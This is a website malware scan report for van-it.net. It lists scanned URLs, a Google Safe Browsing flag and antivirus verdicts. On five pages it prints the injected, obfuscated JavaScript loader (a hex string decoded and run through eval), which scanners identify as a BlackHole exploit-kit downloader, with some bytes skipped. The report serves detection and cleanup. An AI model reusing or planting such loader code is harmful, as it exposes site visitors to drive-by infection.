Malware Scanner report for van-it.net

Malicious/Suspicious/Total urls checked: 5/0/23

5 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "van-it.net" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=van-it.net

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://van-it.net/	200 OK Content-Length: 18535 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) sbw="spl"+"i"+"t";pflsj=window;asba="0"+"x";duggks=(5-3-1);try{--(document["body"])}catch(inmese){pqbi=false;try{}catch(slzyyp){pqbi=21;}if(1){hvqec="17:5d:6c:65:5a:6b:60:66:65:17:63:6b:5a:65:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:63:6b:5a:65:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4: ... 3486 bytes are skipped ...:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:63:6b:5a:65:27:30:1f:20:32:4:1:74:4:1:74"[sbw](":");}pflsj=hvqec;asr=[];for(btdcrg=22-20-2;-btdcrg+1413!=0;btdcrg+=1){iqz=btdcrg;if((0x19==031))asr+=String.fromCharCode(eval(asba+pflsj[1*iqz])+0xa-duggks);}behoc=eval;behoc(asr)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.BlackHole.HB Ikarus Virus.JS.Exploit nProtect JS:Exploit.BlackHole.HB TrendMicro-HouseCall TROJ_GEN.F47V1121 Comodo Exploit.JS.Expack.G Emsisoft JS:Exploit.BlackHole.HB (B) McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Microsoft Exploit:JS/Blacole.NX Kaspersky Trojan-Downloader.JS.Agent.gyg MicroWorld-eScan JS:Exploit.BlackHole.HB Fortinet JS/Kryptik.AOW!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cgzaxv F-Secure JS:Exploit.BlackHole.HB VIPRE Exploit.JS.Blacole.nx (v) AVG JS/Exploit Norman Kryptik.CCLX GData JS:Exploit.BlackHole.HB ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.BlackHole.HB
http://van-it.net/index.html	200 OK Content-Length: 18535 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) sbw="spl"+"i"+"t";pflsj=window;asba="0"+"x";duggks=(5-3-1);try{--(document["body"])}catch(inmese){pqbi=false;try{}catch(slzyyp){pqbi=21;}if(1){hvqec="17:5d:6c:65:5a:6b:60:66:65:17:63:6b:5a:65:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:63:6b:5a:65:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4: ... 3486 bytes are skipped ...:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:63:6b:5a:65:27:30:1f:20:32:4:1:74:4:1:74"[sbw](":");}pflsj=hvqec;asr=[];for(btdcrg=22-20-2;-btdcrg+1413!=0;btdcrg+=1){iqz=btdcrg;if((0x19==031))asr+=String.fromCharCode(eval(asba+pflsj[1*iqz])+0xa-duggks);}behoc=eval;behoc(asr)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.BlackHole.HB Ikarus Virus.JS.Exploit nProtect JS:Exploit.BlackHole.HB TrendMicro-HouseCall TROJ_GEN.F47V1121 Comodo Exploit.JS.Expack.G Emsisoft JS:Exploit.BlackHole.HB (B) McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Microsoft Exploit:JS/Blacole.NX Kaspersky Trojan-Downloader.JS.Agent.gyg MicroWorld-eScan JS:Exploit.BlackHole.HB Fortinet JS/Kryptik.AOW!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cgzaxv F-Secure JS:Exploit.BlackHole.HB VIPRE Exploit.JS.Blacole.nx (v) AVG JS/Exploit Norman Kryptik.CCLX GData JS:Exploit.BlackHole.HB ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.BlackHole.HB
http://van-it.net/pb/wp_4be0985d/wp_4be0985d.html	200 OK Content-Length: 16156 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) hnt="spl"+"i"+"t";eaa=window;pjztv="0"+"x";xxe=(5-3-1);try{--(document["body"])}catch(zim){mqik=false;try{}catch(yhmr){mqik=21;}if(1){qatex="17:5d:6c:65:5a:6b:60:66:65:17:5d:6c:5e:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5d:6c:5e:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:5d:6c: ... 3378 bytes are skipped ...:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:5d:6c:5e:27:30:1f:20:32:4:1:74:4:1:74"[hnt](":");}eaa=qatex;luisar=[];for(uqdvcc=22-20-2;-uqdvcc+1377!=0;uqdvcc+=1){nbnyg=uqdvcc;if((0x19==031))luisar+=String.fromCharCode(eval(pjztv+eaa[1*nbnyg])+0xa-xxe);}ayuhpu=eval;ayuhpu(luisar)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.BlackHole.HB Ikarus Virus.JS.Exploit nProtect JS:Exploit.BlackHole.HB TrendMicro-HouseCall TROJ_GEN.F47V1121 Comodo Exploit.JS.Expack.G Emsisoft JS:Exploit.BlackHole.HB (B) McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Microsoft Exploit:JS/Blacole.NX Kaspersky Trojan-Downloader.JS.Agent.gyg MicroWorld-eScan JS:Exploit.BlackHole.HB Fortinet JS/Kryptik.AOW!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cgzaxv F-Secure JS:Exploit.BlackHole.HB VIPRE Exploit.JS.Blacole.nx (v) AVG JS/Exploit Norman Kryptik.CCLX GData JS:Exploit.BlackHole.HB ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.BlackHole.HB
http://van-it.net/pb/wp_4be0985d/../../index.html	HTTP/1.1 403 Forbidden Connection: close Date: Sun, 11 Jan 2015 05:01:29 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html	clean
http://templates.doteasy.com/errorpages/error403/	200 OK Content-Length: 10584 Content-Type: text/html	clean
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js	200 OK Content-Length: 93435 Content-Type: text/javascript	clean
http://van-it.net/pb/wp_4be0985d/../../js/selectBox/jquery.selectBox.min.js	HTTP/1.1 403 Forbidden Connection: close Date: Sun, 11 Jan 2015 05:01:31 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html	clean
http://templates.doteasy.com/test404page.js	404 Not Found Content-Length: 1245 Content-Type: text/html	clean
http://van-it.net/pb/wp_4be0985d/../../js/jquery.watermark.min.js	HTTP/1.1 403 Forbidden Connection: close Date: Sun, 11 Jan 2015 05:01:32 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html	clean
http://van-it.net/pb/wp_4be0985d/../../js/fancybox/jquery.fancybox.js	HTTP/1.1 403 Forbidden Connection: close Date: Sun, 11 Jan 2015 05:01:32 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html	clean
http://van-it.net/pb/wp_4be0985d/../../js/fancybox/helpers/jquery.fancybox-media.js	HTTP/1.1 403 Forbidden Connection: close Date: Sun, 11 Jan 2015 05:01:33 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html	clean
http://van-it.net/pb/wp_4be0985d/../../pb/wp_4be0985d/wp_4be0985d.html	HTTP/1.1 403 Forbidden Connection: close Date: Sun, 11 Jan 2015 05:01:33 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html	clean
http://van-it.net/pb/wp_4be0985d/../../pb/wp_4a92c795/wp_4a92c795.html	HTTP/1.1 403 Forbidden Connection: close Date: Sun, 11 Jan 2015 05:01:34 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html	clean
http://van-it.net/pb/wp_4be0985d/../../pb/wp_49a35ddf/wp_49a35ddf.html	HTTP/1.1 403 Forbidden Connection: close Date: Sun, 11 Jan 2015 05:01:34 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html	clean
http://van-it.net/pb/wp_4be0985d/	HTTP/1.1 403 Forbidden Connection: close Date: Sun, 11 Jan 2015 05:01:35 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html	clean
http://van-it.net/pb/wp_4a92c795/wp_4a92c795.html	200 OK Content-Length: 15416 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) hnt="spl"+"i"+"t";eaa=window;pjztv="0"+"x";xxe=(5-3-1);try{--(document["body"])}catch(zim){mqik=false;try{}catch(yhmr){mqik=21;}if(1){qatex="17:5d:6c:65:5a:6b:60:66:65:17:5d:6c:5e:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:5d:6c:5e:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:5d:6c: ... 3378 bytes are skipped ...:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:5d:6c:5e:27:30:1f:20:32:4:1:74:4:1:74"[hnt](":");}eaa=qatex;luisar=[];for(uqdvcc=22-20-2;-uqdvcc+1377!=0;uqdvcc+=1){nbnyg=uqdvcc;if((0x19==031))luisar+=String.fromCharCode(eval(pjztv+eaa[1*nbnyg])+0xa-xxe);}ayuhpu=eval;ayuhpu(luisar)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.BlackHole.HB Ikarus Virus.JS.Exploit nProtect JS:Exploit.BlackHole.HB TrendMicro-HouseCall TROJ_GEN.F47V1121 Comodo Exploit.JS.Expack.G Emsisoft JS:Exploit.BlackHole.HB (B) McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Microsoft Exploit:JS/Blacole.NX Kaspersky Trojan-Downloader.JS.Agent.gyg MicroWorld-eScan JS:Exploit.BlackHole.HB Fortinet JS/Kryptik.AOW!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cgzaxv F-Secure JS:Exploit.BlackHole.HB VIPRE Exploit.JS.Blacole.nx (v) AVG JS/Exploit Norman Kryptik.CCLX GData JS:Exploit.BlackHole.HB ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.BlackHole.HB
http://van-it.net/pb/wp_4a92c795/../../index.html	HTTP/1.1 403 Forbidden Connection: close Date: Sun, 11 Jan 2015 05:01:36 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html	clean
http://van-it.net/pb/wp_4a92c795/../../pb/wp_4be0985d/wp_4be0985d.html	HTTP/1.1 403 Forbidden Connection: close Date: Sun, 11 Jan 2015 05:01:36 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html	clean
http://van-it.net/pb/wp_4a92c795/../../pb/wp_4a92c795/wp_4a92c795.html	HTTP/1.1 403 Forbidden Connection: close Date: Sun, 11 Jan 2015 05:01:37 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html	clean
http://van-it.net/pb/wp_4a92c795/../../pb/wp_49a35ddf/wp_49a35ddf.html	HTTP/1.1 403 Forbidden Connection: close Date: Sun, 11 Jan 2015 05:01:37 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html	clean
http://van-it.net/pb/wp_4a92c795/	HTTP/1.1 403 Forbidden Connection: close Date: Sun, 11 Jan 2015 05:01:38 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html	clean
http://van-it.net/pb/wp_49a35ddf/wp_49a35ddf.html	200 OK Content-Length: 18359 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) sbw="spl"+"i"+"t";pflsj=window;asba="0"+"x";duggks=(5-3-1);try{--(document["body"])}catch(inmese){pqbi=false;try{}catch(slzyyp){pqbi=21;}if(1){hvqec="17:5d:6c:65:5a:6b:60:66:65:17:63:6b:5a:65:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:63:6b:5a:65:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4: ... 3486 bytes are skipped ...:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:63:6b:5a:65:27:30:1f:20:32:4:1:74:4:1:74"[sbw](":");}pflsj=hvqec;asr=[];for(btdcrg=22-20-2;-btdcrg+1413!=0;btdcrg+=1){iqz=btdcrg;if((0x19==031))asr+=String.fromCharCode(eval(asba+pflsj[1*iqz])+0xa-duggks);}behoc=eval;behoc(asr)} Antivirus reports: AntiVir EXP/JS.Expack.GQ Avast JS:Decode-BML [Trj] Ad-Aware JS:Exploit.BlackHole.HB Ikarus Virus.JS.Exploit nProtect JS:Exploit.BlackHole.HB TrendMicro-HouseCall TROJ_GEN.F47V1121 Comodo Exploit.JS.Expack.G Emsisoft JS:Exploit.BlackHole.HB (B) McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.500 Microsoft Exploit:JS/Blacole.NX Kaspersky Trojan-Downloader.JS.Agent.gyg MicroWorld-eScan JS:Exploit.BlackHole.HB Fortinet JS/Kryptik.AOW!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cgzaxv F-Secure JS:Exploit.BlackHole.HB VIPRE Exploit.JS.Blacole.nx (v) AVG JS/Exploit Norman Kryptik.CCLX GData JS:Exploit.BlackHole.HB ESET-NOD32 JS/Kryptik.AOG BitDefender JS:Exploit.BlackHole.HB
http://apps.van-it.net/webform/?event=form.jsShow&formId=5107&key=B4E3AD2901	200 OK Content-Length: 155800 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: van-it.net

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 05:01:27 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 18535
Content-Type: text/html
Last-Modified: Thu, 19 Sep 2013 05:09:10 GMT

...18535 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: van-it.net
Referer: http://www.google.com/search?q=van-it.net

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for van-it.net

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools